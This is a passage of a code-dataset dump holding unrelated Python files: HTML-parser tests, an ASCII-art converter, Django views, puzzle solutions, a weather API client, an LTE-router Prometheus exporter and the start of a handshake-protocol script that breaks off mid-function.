self.assertCodecEqual(mechanize_mini.detect_charset(b'bla', 'latin-1'), 'cp1252')\n\n def test_html(self):\n # standard case\n self.assertHtmlEqualsXml(b'

      bla', '

      bla

      ')\n\n # unicode characters interpreted as cp1252\n self.assertHtmlEqualsXml('a\\u2019b'.encode('utf-8'), 'a’b')\n\n # cp1252 characters misinterpreted as utf-8\n self.assertHtmlEqualsXml('aüb'.encode('cp1252'), 'a\\uFFFDb', charset='utf8')\n\nclass TestConvenience(unittest.TestCase):\n def test_text_content(self):\n content = mechanize_mini.parsefragmentstr('bla')\n self.assertEqual(content.text_content, 'bla')\n\n el = mechanize_mini.parsefragmentstr('

      bla


      blub \\nhola

      ')\n self.assertEqual(el.text_content, 'bla blub hola')\n\n def test_inner_html(self):\n el = mechanize_mini.HTML('

      Hello World

      ')\n self.assertEqual(el.inner_html, 'Hello World')\n\n el.inner_html = 'Goodbye World'\n self.assertEqual(el.text, 'Goodbye ')\n self.assertEqual(len(el), 1)\n self.assertEqual(el.outer_xml, '

      Goodbye World

      ')\n\nclass FindStuffTest(unittest.TestCase):\n def test_find_by_tag_name(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/form.html')\n\n self.assertEqual(test.query_selector('form').tag, 'form')\n\n def test_find_by_class(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/elements.html')\n\n # not existing\n self.assertEqual(test.query_selector('.nada'), None)\n\n # but there should be two of these\n self.assertEqual(len(list(test.query_selector_all('p.important'))), 2)\n\n def test_find_by_id(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/elements.html')\n\n self.assertEqual(test.query_selector('#importantest').get('id'), 'importantest')\n\n def test_find_by_text(self):\n test = mechanize_mini.parsefile(os.path.dirname(os.path.abspath(__file__)) + '/files/elements.html')\n\n self.assertEqual(test.query_selector('.bar.baz.important').text_content, 'I am even more importanter')\n\n self.assertEqual(test.query_selector('p:contains(I am even more importanter)').get('class'), 'bar baz important')\n\nclass SelectorTest(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.f = mechanize_mini.HTML('''\n
      \n
      \n test\n
      \n test2\n
      \n

      \n bar\n

      \n ''')\n\n\n def test_tags(self):\n spans = list(self.f.query_selector_all('span'))\n self.assertEqual(len(spans), 3)\n self.assertEqual([e.text for e in spans], ['test', 'test2', 'bar'])\n\n def test_descendant(self):\n indiv = list(self.f.query_selector_all('div span'))\n #self.assertEqual(len(indiv), 2)\n self.assertEqual([e.text for e in indiv], ['test', 'test2'])\n\n doubldiv = list(self.f.query_selector_all('div div span'))\n self.assertEqual(len(doubldiv), 1)\n self.assertEqual(doubldiv[0].text, 'test')\n\n nope = list(self.f.query_selector_all('html div'))\n self.assertEqual(len(nope), 0)\n\n def test_class_id(self):\n clazz = list(self.f.query_selector_all('.a'))\n self.assertEqual([e.text for e in clazz], ['test', 'test2'])\n\n clazz = list(self.f.query_selector_all('#outerdiv.outerdiv div#innerdiv span.a'))\n self.assertEqual([e.text for e in clazz], ['test'])\n\n multiclazz = list(self.f.query_selector_all('.a.b'))\n self.assertEqual([e.text for e in multiclazz], ['test2'])\n\n def test_child(self):\n immed = list(self.f.query_selector_all('.outerdiv >.a'))\n self.assertEqual([e.text for e in immed], ['test2'])\n\n def test_invalid(self):\n with self.assertRaises(mechanize_mini.InvalidSelectorError):\n list(self.f.query_selector_all('a:hover')) # not supported and will never be\n\n def test_universal_selector(self):\n sel = list(self.f.query_selector_all('* div'))\n self.assertEqual([e.id for e in sel], ['innerdiv'])\n\n sel = list(self.f.query_selector_all('* html')) # this is not IE6\n self.assertEqual(sel, [])\n\n def test_additional_whitespace(self):\n immed = list(self.f.query_selector_all(\".outerdiv> \\t .a \"))\n self.assertEqual([e.text for e in immed], ['test2'])\n\n def test_contains(self):\n self.assertEqual(self.f.query_selector(\"p:contains(\\\"bar\\\")\").id, 'barp')\n self.assertEqual(self.f.query_selector(\"span:contains(ba)\").text_content, 'bar')\n\n def test_empty(self):\n self.assertEqual(self.f.query_selector(''), None)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"genosse-einhorn/python-mechanize-mini","sub_path":"test/htmltree.py","file_name":"htmltree.py","file_ext":"py","file_size_in_byte":19429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3987369824","text":"import sys, argparse\nimport numpy as np\nimport math\nimport time \n\nfrom PIL import Image\n \n# gray scale level values from:\n# http://paulbourke.net/dataformats/asciiart/\n \n\ngscale1 = \"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \"\n \n\ngscale2 = '@%#*+=-:. '\n# gscale2 = \"@#S%?*+;:, \"\n \ndef getAverageL(image):\n \n\n im = np.array(image)\n w,h = im.shape\n \n\n return np.average(im.reshape(w*h))\n \ndef convertImageToAscii(image, w, scale , moreLevels):\n\n global gscale1, gscale2\n \n\n # image = Image.open(fileName).convert('L')\n image = image.convert(\"L\")\n\n W, H = image.size[0], image.size[1]\n # print(\"input image dims: %d x %d\" % (W, H))\n \n cols = int(W/w)\n h = w*scale\n rows = int(H/h)\n \n # print(\"cols: %d, rows: %d\" % (cols, rows))\n\n # print(\"tile dims: %d x %d\" % (w, h))\n \n\n if cols > W or rows > H:\n print(\"Image too small for specified cols!\")\n exit(0)\n \n\n aimg = []\n\n for j in range(rows):\n y1 = int(j*h)\n y2 = int((j+1)*h)\n \n # correct last tile\n if j == rows-1:\n y2 = H\n \n aimg.append(\"\")\n \n for i in range(cols):\n\n x1 = int(i*w)\n x2 = int((i+1)*w)\n \n if i == cols-1:\n x2 = W\n\n lg1 = len(gscale1)-1\n lg2 = len(gscale2)-1\n\n img = image.crop((x1, y1, x2, y2))\n \n avg = int(getAverageL(img))\n \n if moreLevels:\n gsval = gscale1[int((avg*lg1)/255)]\n else:\n gsval = gscale2[int((avg*lg2)/255)]\n \n aimg[j] += gsval\n \n return aimg\n \n\ndef main():\n\n descStr = \"This program converts an image into ASCII art.\"\n parser = argparse.ArgumentParser(description=descStr)\n\n parser.add_argument('--file', dest='imgFile', required=True)\n parser.add_argument('--scale', dest='scale', required=False)\n parser.add_argument('--out', dest='outFile', required=False)\n parser.add_argument('--w', dest='w', required=False)\n parser.add_argument('--morelevels',dest='moreLevels',action='store_true')\n \n\n args = parser.parse_args()\n \n imgFile = args.imgFile\n \n\n outFile = 'out.txt'\n if args.outFile:\n outFile = args.outFile\n \n\n if args.scale:\n scale = float(args.scale)\n \n if args.w:\n w = int(args.w)\n\n t1 = time.time()\n\n image = Image.open(imgFile)\n \n print('generating ASCII art...')\n aimg = convertImageToAscii(image, w, scale, args.moreLevels)\n \n f = open(outFile, 'w')\n \n for row in aimg:\n f.write(row + '\\n')\n \n f.close()\n print(\"ASCII art written to %s\" % outFile)\n t2 = time.time()\n print(f\"Time for generate ascii {t2 - t1}\")\n \nif __name__ == '__main__':\n main()","repo_name":"JKLeorio/asciiConventer","sub_path":"asciiImageConverter.py","file_name":"asciiImageConverter.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20654873448","text":"from django.shortcuts import render\n\n\ndef example_view(req):\n # my_app/templates/my_app/example.html\n return render(req, 'my_app/example.html')\n\n\ndef variable_view(req):\n my_var = {\n # 字符串变量\n 'first_name': 'Rosalind',\n 'last_name': 'Franklin',\n # list变量\n 'some_list': [1, 2, 3],\n # 字典变量\n 'some_dict': {\n 'inside_key': 'inside_value'\n },\n # bool\n 'user_logged_in': True\n }\n # context是上下文对象,在模板文件里可以拿到\n return render(req, 'my_app/variable.html', context=my_var)\n","repo_name":"malred/i_site","sub_path":"my_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38073718145","text":"import sys\n\nin_put = sys.stdin.readline\n\n\ndef selfnum(n):\n a=b=c=d=0\n if n >= 1000:\n a = n // 1000\n if n >= 100:\n b = (n//100 )%10\n if n >= 10:\n c = (n//10)%10\n d= n%10\n\n return n+a+b+c+d\n\n\n\nd=[]\nfor i in range(1,10000):\n d.append(selfnum(i))\n\n\n\nfor i in range(1,10000):\n if not d.count(i):\n print(i)\n","repo_name":"machi107/Baekjoon-Codes","sub_path":"Silver 5/4673 셀프 넘버.py","file_name":"4673 셀프 넘버.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41796583995","text":"import urllib.request\nimport json\nfrom datetime import datetime, timedelta\n\n\nclass requester:\n \"\"\"\n This class is to request the timestamp and weather stock_info from the API\n and return it as a dictionary validating for date interval or sending\n yesterday information\n \"\"\"\n\n def __init__(self) -> None:\n \" Defining the url for the API\"\n self.__url = \"https://api.weather.gov/stations/KBFL/observations\"\n\n def get_weather_report(self, start: str, end: str) -> dict:\n \"Method that returns the information when start and end date is provided\"\n try:\n st = datetime.strptime(start, \"%Y-%m-%dT%H:%M:%SZ\")\n e = datetime.strptime(end, \"%Y-%m-%dT%H:%M:%SZ\")\n if e < st:\n return \"start date is greater than end date\"\n except ValueError:\n return 'Incorrect start or end data format, /n \\\n format should be \"%Y-%m-%dT%H:%M:%SZ\"'\n\n api_request = self.__url + '?start=' + start + '&end=' + end\n response = urllib.request.urlopen(api_request)\n data: bytes = response.read()\n station_info: dict = json.loads(data)\n result = self.__timestamp_temp(station_info)\n return result\n\n def yesterday_weather_report(self) -> dict:\n \"Method that returns the information for yesterday\"\n today = datetime.now().strftime(\"%Y-%m-%d\")\n today = datetime.strptime(today, \"%Y-%m-%d\")\n yesterday = today - timedelta(days=1)\n start = yesterday.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n end = today.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n api_request = self.__url + '?start=' + start + '&end=' + end\n response = urllib.request.urlopen(api_request)\n data: bytes = response.read()\n station_info: dict = json.loads(data)\n result = self.__timestamp_temp(station_info)\n return result\n\n def __timestamp_temp(self, station_info: dict) -> list:\n \"Method that returns a list with only timestamp and temperature \\\n receiving the station_info from the API converted to dict\"\n result = []\n for record in station_info['features']:\n result.append((record['properties']['timestamp'],\n record['properties']['temperature']['value']))\n return result[::-1]\n","repo_name":"lfbejarano/Sri-Challenge","sub_path":"API/data_request.py","file_name":"data_request.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23389454811","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport logging\n#logging.basicConfig(level=logging.DEBUG)\n#interact = True\ninteract = False\n\nclass Solved(Exception):\n\tpass\ndef mowed(line, mowed_perpendicular_lines, L, P):\n\ttry:\n\t\tunmowed_fields = set(range(P))-set(mowed_perpendicular_lines)\n\t\tan_unmowed_field = list(unmowed_fields)[0]\n\t\tpossible_height = line[an_unmowed_field]\n\t\tlogging.debug((\"unmowed\", unmowed_fields, an_unmowed_field, mowed_perpendicular_lines))\n\texcept IndexError:\n\t\traise Solved\n\treturn all((line[i] == possible_height) or ((line[i] < possible_height) and i in mowed_perpendicular_lines) for i in range(P))\n\ndef solve_case(case):\n\tlogging.debug((\"solving\", case))\n\tN, M = case[0]\n\tgrid = case[1:]\n\tmowed_rows = []\n\tmowed_columns = []\n\ttry:\n\t\twhile True:\n\t\t\tfound_mowed = False\n\t\t\tfor line, index, mowed_lines, mowed_perpendicular_lines, L, P, debug in [(grid[i], i, mowed_rows, mowed_columns, N, M, \"rows\") for i in range(N)] + [([grid[j][i] for j in range(N)], i, mowed_columns, mowed_rows, M, N, \"columns\") for i in range(M)]:\n\t\t\t\tlogging.debug((\"checking\", debug, line, index, mowed_lines, mowed_perpendicular_lines))\n\t\t\t\tif index not in mowed_lines and mowed(line, mowed_perpendicular_lines, L, P):\n\t\t\t\t\tmowed_lines.append(index)\n\t\t\t\t\tfound_mowed = True\n\t\t\t\t\tlogging.debug(\"yes\")\n\t\t\tif len(mowed_rows) == N or len(mowed_columns) == M:\n\t\t\t\traise Solved\n\t\t\tif not found_mowed:\n\t\t\t\tlogging.debug(\"NO\")\n\t\t\t\treturn \"NO\"\n\texcept Solved:\n\t\tlogging.debug(\"YES\")\n\t\treturn \"YES\"\n\ndef case_line(case_number, cases):\n\t\"\"\"case_number != list index\"\"\"\n\tif interact:\n\t\tinput(case_number)\n\treturn \"Case #{}: {}\".format(case_number, solve_case(cases[case_number-1]))\n\ndef set_to_cases(set_):\n\treturn set_.split(\"\\n\")[1:-1]\n\ndef set_to_cases_blocks(set_):\n\treturn \"\\n\".join(set_to_cases(set_)).split(\"\\n\\n\")\n\ndef set_to_cases_blocks_numbered(set_):\n\tit = iter(set_to_cases(set_))\n\twhile True:\n\t\ttry:\n\t\t\tN, M = map(int, next(it).split(\" \"))\n\t\texcept StopIteration:\n\t\t\tbreak\n\t\telse:\n\t\t\tcase = [(N, M)]\n\t\t\tfor i in range(N):\n\t\t\t\tcase.append(next(it).split(\" \"))\n\t\t\tyield case\n\ndef solve_set(set_):\n\tcases = list(set_to_cases_blocks_numbered(set_))\n\treturn \"\\n\".join(case_line(i+1, cases) for i in range(len(cases)))\n\ntest_in = \"\"\"3\n3 3\n2 1 2\n1 1 1\n2 1 2\n5 5\n2 2 2 2 2\n2 1 1 1 2\n2 1 2 1 2\n2 1 1 1 2\n2 2 2 2 2\n1 3\n1 2 1\n3 1\n1\n2\n1\n\"\"\"\n\ntest_out = \"\"\"Case #1: YES\nCase #2: NO\nCase #3: YES\nCase #4: YES\"\"\"\n\ndef compare_test_case_line(case_number):\n\ttest_solution_line = case_line(case_number, set_to_cases(test_in))\n\ttest_out_line = test_out.split(\"\\n\")[case_number]\n\tif test_solution_line == test_out_line:\n\t\tlogging.info(\"Test line {} passed\".format(case_number))\n\telse:\n\t\tlogging.warning(\"Test line {} failed\".format(case_number))\n\t\tlogging.info(test_solution_line)\n\t\tlogging.info(test_out_line)\n\nlogging.info(list(set_to_cases_blocks_numbered(test_in)))\n\ntest_solution = solve_set(test_in)\n\nif test_solution == test_out:\n\tlogging.info(\"Test passed\")\nelse:\n\tlogging.warning(\"Test failed\")\n\tlogging.info(test_solution)\n\tlogging.info(test_out)\n\nproblem_letter = \"B\"\nattempt = 1\nfor problem_size in (\"small\", \"large\"):\n\tif input(\"Solve {} {}? (y)\".format(problem_letter, problem_size)):\n\t\tname = \"{}-{}{}\".format(problem_letter, problem_size, problem_size == \"small\" and \"-attempt{}\".format(attempt) or \"\")\n\t\twith open(name + \".in\") as file_in:\n\t\t\twith open(name + \".out\".format(problem_letter, problem_size), \"w\") as file_out:\n\t\t\t\tprint(solve_set(file_in.read()), file=file_out)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/678.py","file_name":"678.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28133872310","text":"import random\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.admin.utils import flatten\nfrom django_seed import Seed\nfrom users import models as user_models\nfrom advertisements import models as ad_models\n\n\nclass Command(BaseCommand):\n\n help = \"This command helps to create students' advertisement\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--number\", default=2, type=int, help=\"How many ads you want to create\"\n )\n\n def handle(self, *args, **options):\n number = options.get(\"number\")\n seeder = Seed.seeder()\n all_users = user_models.User.objects.all()\n instrument = ad_models.instrumentChoice.objects.all()\n seeder.add_entity(\n ad_models.Advertisement,\n number,\n {\n \"student\": lambda x: random.choice(all_users),\n \"instrument\": lambda x: random.choice(instrument),\n \"min_fee\": lambda x: random.randint(10000, 30000),\n \"max_fee\": lambda x: random.randint(30000, 100000),\n },\n )\n\n created_ads = seeder.execute()\n created_clean = flatten(list(created_ads.values()))\n desired_lesson_days = ad_models.LessonDay.objects.all()\n lesson_type = ad_models.LessonType.objects.all()\n prefer_style = ad_models.PreferStyle.objects.all()\n\n for pk in created_clean:\n advertisement = ad_models.Advertisement.objects.get(pk=pk)\n\n for d in desired_lesson_days:\n magic_number = random.randint(0, 10)\n if magic_number % 2 == 0:\n advertisement.desired_lesson_days.add(d)\n\n for t in lesson_type:\n magic_number = random.randint(0, 10)\n if magic_number % 2 == 0:\n advertisement.lesson_type.add(t)\n\n for p in prefer_style:\n magic_number = random.randint(0, 10)\n if magic_number % 2 == 0:\n advertisement.prefer_style.add(p)\n\n self.stdout.write(self.style.SUCCESS(f\"{number} students' ads created!\"))\n","repo_name":"bolmun/music_application","sub_path":"advertisements/management/commands/seed_ads.py","file_name":"seed_ads.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27519191173","text":"from __future__ import print_function # Python 2/3 compatibility\r\nimport boto3\r\nimport json\r\nimport decimal\r\nfrom boto3.dynamodb.conditions import Key\r\n\r\n# Define what table to query base on lex intent\r\nreturn_table = {\r\n 'aboutBooth': 'TempBoothInfo2',\r\n 'aboutEvent': 'EventInfo',\r\n 'Software_Engineering_Booth': 'workshopList'\r\n}\r\nreturn_slot = {\r\n 'aboutBooth': 'Booth',\r\n 'aboutEvent': 'eventName',\r\n 'aboutWorkshop': 'workshopName',\r\n 'listWorkshop': 'workshopList'\r\n}\r\n\r\n\r\ndef queryDB(intent_name,item_name):\r\n try:\r\n dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\r\n table = dynamodb.Table(return_table[intent_name])\r\n response = table.query(\r\n IndexName='Info-index',\r\n KeyConditionExpression=Key('Name').eq(item_name)\r\n )\r\n item_name = str(response['Items'][0]['Info'])\r\n except Exception as e:\r\n item_name += ' is not found. queryDB Debug: ' + str(e)\r\n return item_name\r\n\r\ndef main(event,context):\r\n try:\r\n intent_name = event['currentIntent']['name']\r\n item_name = event['currentIntent']['slotDetails'][return_slot[intent_name]]['resolutions'][0]['value']\r\n except Exception as e:\r\n output = 'Booth not found. Debug: ' + str(e)\r\n response ={\r\n \"dialogAction\": {\r\n \"type\": \"Close\",\r\n \"fulfillmentState\": \"Fulfilled\",\r\n \"message\": {\r\n \"contentType\": \"CustomPayload\",\r\n \"content\": \"Here is what I found: \" + output\r\n },\r\n }\r\n }\r\n return response\r\n\r\n\r\n","repo_name":"180133517/fyp-cdk","sub_path":"cdkdeploy/lambda/lexResponseWithDBinPython.py","file_name":"lexResponseWithDBinPython.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35796896770","text":"try:\n import os\n import gym_minigrid\n from gym_minigrid.wrappers import *\n from gym_minigrid.envelopes_light import *\n from gym import wrappers, logger\nexcept Exception as e:\n print(\" =========== =========== IMPORT ERROR ===========\")\n print(e)\n pass\n\nfrom configurations import config_grabber as cg\n\n\ndef make_env(env_id, seed, rank, evaluation_id, force=False, resume=False, custom_message=\"_\"):\n\n config = cg.Configuration.grab()\n\n def _thunk():\n env = gym.make(env_id)\n env.seed(seed + rank)\n\n if config.envelope:\n env = SafetyEnvelope(env)\n\n # record only the first agent\n if config.recording and rank==0:\n print(\"starting recording..\")\n eval_folder = os.path.abspath(os.path.dirname(__file__) + \"/../\" + config.evaluation_directory_name)\n if config.envelope:\n expt_dir = eval_folder + \"/\" + evaluation_id + \"_videos\"\n else:\n expt_dir = eval_folder + \"/\" + evaluation_id + \"_videos\"\n\n uid = \"___proc_n_\" + str(rank) + \" ___\" + custom_message + \"__++__\"\n env = wrappers.Monitor(env, expt_dir, uid=uid, force=force, resume=resume)\n\n return env\n\n return _thunk\n","repo_name":"pierg/wiseml-patterns","sub_path":"pytorch_a2c/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39346109666","text":"'''\n\n24-game gives the player 4 numbers, and ask for player to use operations +, -, * on these numbers\nin a way that the result equals to 24\n\n'''\nimport operator\nimport random\nimport itertools\n\nclass number_set():\n\n def __init__(self, a, b, c, d):\n\n self.numbers = [a, b, c, d]\n\n def start_game(self):\n print('Wecome to the game. here are the {0}'.format(self.numbers))\n\n def user_input(self):\n ask_for_input = input(\"please give 3 operations (possible: add for +, sub for -, mul for *) in the order, separate by comma\") # add, sub, mul\n\n while not(len(ask_for_input) == 13):\n ask_for_input = input(\"please check if the operations are correct\")\n\n return ask_for_input\n\n def split(self, user_input):\n x,y,z = user_input.split(',')\n\n return [x.replace(' ', ''),y.replace(' ', ''),z.replace(' ', '')]\n\n def operators(self, operators):\n\n _func = {'add': operator.add, # add\n 'sub': operator.sub, # substract\n 'mul': operator.mul # multiplication\n }\n\n self.f1 = _func[operators[0]]\n self.f2 = _func[operators[1]]\n self.f3 = _func[operators[2]]\n\n def calculate(self):\n self.result1 = self.f1(self.numbers[0], self.numbers[1])\n self.result2 = self.f2(self.result1, self.numbers[2])\n self.result3 = self.f3(self.result2, self.numbers[3])\n return self.result3\n\n def check_answer(self, result3):\n if self.result3 == 24:\n print('Correct')\n\n trial = 0\n while self.result3 != 24:\n print(\"The current answer is {}. Enter 'T' to try again. Enter 'N' to shower answer\".format(self.result3))\n choice = input()\n if choice == 'T' and trial <= 3:\n trial += 1\n user_operations = self.user_input()\n user_operations = self.split(user_operations)\n self.operators(user_operations)\n self.result3 = self.calculate()\n #print(\"The current answer is {}. Enter 'T' to try again. Enter 'N' to shower answer\".format(self.result3))\n if choice == 'T' and trial > 3:\n print('you have reached total number of trials')\n print(answer)\n else:\n print(answer)\n break\n\ndef generate_answers():\n list_all_num = list(itertools.combinations_with_replacement(range(1, 10), 4))\n #print(len(list_all_num))\n\n ops = ['add', 'sub', 'mul']\n list_all_ops = list(itertools.combinations_with_replacement(ops, 3))\n #print(list_all_ops)\n\n possible_cases = []\n all_answers = []\n for i in list_all_num:\n test = number_set(*i)\n for j in list_all_ops:\n user_operations = j\n test.operators(user_operations)\n temp = test.calculate()\n if temp == 24:\n possible_cases.append(i)\n all_answers.append([i, j])\n\n return possible_cases, all_answers\n\nif __name__ == '__main__':\n possible_cases, all_answers = generate_answers()\n\n choice = random.choice(possible_cases)\n answer_index = possible_cases.index(choice)\n answer = all_answers[answer_index] # save the answer\n\n test = number_set(*choice)\n test.start_game()\n\n user_operations = test.user_input()\n user_operations = test.split(user_operations)\n test.operators(user_operations)\n\n result = test.calculate()\n test.check_answer(result)\n\n\n","repo_name":"ailjia/24-Game","sub_path":"pair-programming.py","file_name":"pair-programming.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11172478056","text":"import sys\n\ninput = sys.stdin.readline\n\ndef translate_letter_2_index(letter):\n return ord(letter) - ord(\"A\")\n\ndef dfs(depth, x, y):\n global result\n\n if depth > result:\n result = depth\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if (0<=nx= n//2+1 and med == None:\n med = num\n\nprint(round(s/n), med, mode, max_n - min_n, sep='\\n')","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/1 sort/statistics_2108.py","file_name":"statistics_2108.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33296724813","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\nimport os\n\nfrom huawei_lte_api.AuthorizedConnection import AuthorizedConnection\nfrom huawei_lte_api.Client import Client\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.end_headers()\n self.wfile.write(prometheusExporter().encode())\n\n\ndef prometheusExporter():\n # Auth to router\n connection = AuthorizedConnection('http://' + os.environ['ROUTER_USER'] + ':' + os.environ['ROUTER_PASS'] + '@' + os.environ['ROUTER_ADDRESS'] + '/')\n # Init Client\n client = Client(connection)\n\n # Common attributes\n device = 'deviceName=\"' + client.device.information().get('DeviceName') + \\\n '\",iccid=\"' + client.device.information().get('Iccid') + '\"'\n band = client.device.signal().get('band')\n deviceband = device\n if band is not None:\n deviceband = device + ',band=\"' + band + '\"'\n\n # Get signal attributes\n signal = {\n 'band': {'help': 'The signal band the LTE connection is using', 'type': 'gauge', 'device': device, 'value': band},\n 'rsrp': {'help': 'The average power received from a single Reference signal in dBm', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rsrp')},\n 'rsrq': {'help': 'Indicates quality of the received signal in db', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rsrq')},\n 'rssi': {'help': 'Represents the entire received power including the wanted power from the serving cell as well as all co-channel power and other sources of noise in dBm', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rssi')},\n 'rscp': {'help': 'Denotes the power measured by a receiver on a particular physical communication channel in dBm', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rscp')},\n 'sinr': {'help': 'The signal-to-noise ratio of the given signal in dB', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('sinr')},\n 'ecio': {'help': 'The EC/IO is a measure of the quality/cleanliness of the signal from the tower to the modem and indicates the signal-to noise ratio in dB', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('ecio')}\n }\n\n # Format for metric\n for attribute, info in signal.items():\n if info['value'] is not None:\n info['value'] = info['value'].replace(\"dBm\", \"\")\n info['value'] = info['value'].replace(\"dB\", \"\")\n info['value'] = info['value'].replace(\">=\", \"\")\n\n # Format data for prometheus\n response = []\n for attribute, info in signal.items():\n if attribute is not None and info['value'] is not None:\n response.append('#HELP ' + attribute + ' ' + info['help'])\n response.append('#TYPE ' + attribute + ' ' + info['type'])\n response.append(\n attribute + '{' + info['device'] + '} ' + info['value'])\n\n return '\\n'.join(response)\n\n\nhttpd = HTTPServer(('', os.environ['HTTP_PORT']), SimpleHTTPRequestHandler)\nhttpd.serve_forever()\n","repo_name":"Lomany/lte-signal-exporter","sub_path":"lte-signal-exporter.py","file_name":"lte-signal-exporter.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23134136152","text":"fhand = open(\"headpp.ply\")\nfout = open(\"headp_no_normal.ply\", \"w\")\nheader_ended = False\nfor line in fhand:\n if not header_ended:\n fout.write(line)\n else:\n fout.write(\" \".join(line.split()[:3]))\n fout.write(\"\\n\")\n if \"end_header\" in line:\n header_ended = True\nfout.close()\n","repo_name":"JingkangZhang/PersonalWebsite","sub_path":"ply_remove_normal.py","file_name":"ply_remove_normal.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43858759645","text":"# Middle Node\n# Bruce Englert, Meghana Gupta, Ray Grant\nimport random\nimport time\n\nimport Functions\nimport Modified_SSL_Handshake\nimport MySQLdb\n\n\n# DIP - Delayed Intermediate Protocol\n\nprivate_key = Functions.generate_private_key()\nONLINE_PORT = 5432\nOFFLINE_PORT = 5433\nonline_shared_key = b''\noffline_shared_key = b''\n\nonline_n = random.randint(100, 200)\noffline_n = random.randint(100, 200)\n\nnext_time = 0\n\n\ndef perform_online_handshake(online_node_socket):\n global online_shared_key\n [successful_handshake, computed_shared_key] = Modified_SSL_Handshake.server_ssl_handshake(online_node_socket,\n \"Middle Node\",\n private_key)\n online_shared_key = computed_shared_key\n return successful_handshake\n\n\ndef perform_offline_handshake(online_node_socket):\n global offline_shared_key\n [successful_handshake, shared_k] = Modified_SSL_Handshake.client_ssl_handshake(online_node_socket, \"Middle Node\",\n private_key)\n offline_shared_key = shared_k\n return successful_handshake\n\n\ndef send_n(node_socket):\n global online_n\n online_n = random.randint(100, 200)\n print(\"[Middle Node] Sending authorization n.\", online_n)\n [iv, encrypted_n] = Functions.aes_encrypt(online_shared_key, bytes([online_n]))\n n_msg = {\"n\": {\"iv\": iv, \"encrypted_n\": encrypted_n}}\n node_socket.sendall(Functions.wrap_to_send(n_msg))\n\n\ndef send_next_time(node_socket):\n global next_time\n next_time = random.randint(5, 20)\n [iv, encrypted_time] = Functions.aes_encrypt(online_shared_key, bytes([next_time]))\n next_t_msg = {\"next_time\": {\"iv\": iv, \"encrypted_time\": encrypted_time}}\n print(\"[Middle Node] Sending next time\", next_time)\n node_socket.sendall(Functions.wrap_to_send(next_t_msg))\n\n\ndef receive_verify_online_n(node_socket):\n global online_n\n\n n_msg = Functions.read_message_with_delimiter(node_socket)\n decrypted_n_bytes = Functions.aes_decrypt(n_msg[\"n\"][\"iv\"], online_shared_key, n_msg[\"n\"][\"encrypted_n\"])\n decrypted_n = int.from_bytes(decrypted_n_bytes, byteorder='big')\n\n if decrypted_n == online_n-1:\n print(\"[Middle Node] n was received and verified\")\n else:\n print(\"[Middle Node] given n failed authorization test\", online_n)\n print(\"should be: \", decrypted_n)\n node_socket.close()\n\n\ndef sanitize_data(data_string):\n return MySQLdb.escape_string(data_string).decode()\n\n\ndef handle_DH_1_online_connection():\n global online_shared_key\n\n online_socket = Modified_SSL_Handshake.handle_node_connection(5432)\n perform_online_handshake(online_socket) # TODO check if returns true\n\n given_dh_value = Functions.read_message_with_delimiter(online_socket)\n\n # send encrypted n\n send_n(online_socket)\n send_next_time(online_socket)\n online_socket.close()\n return given_dh_value\n\n\ndef 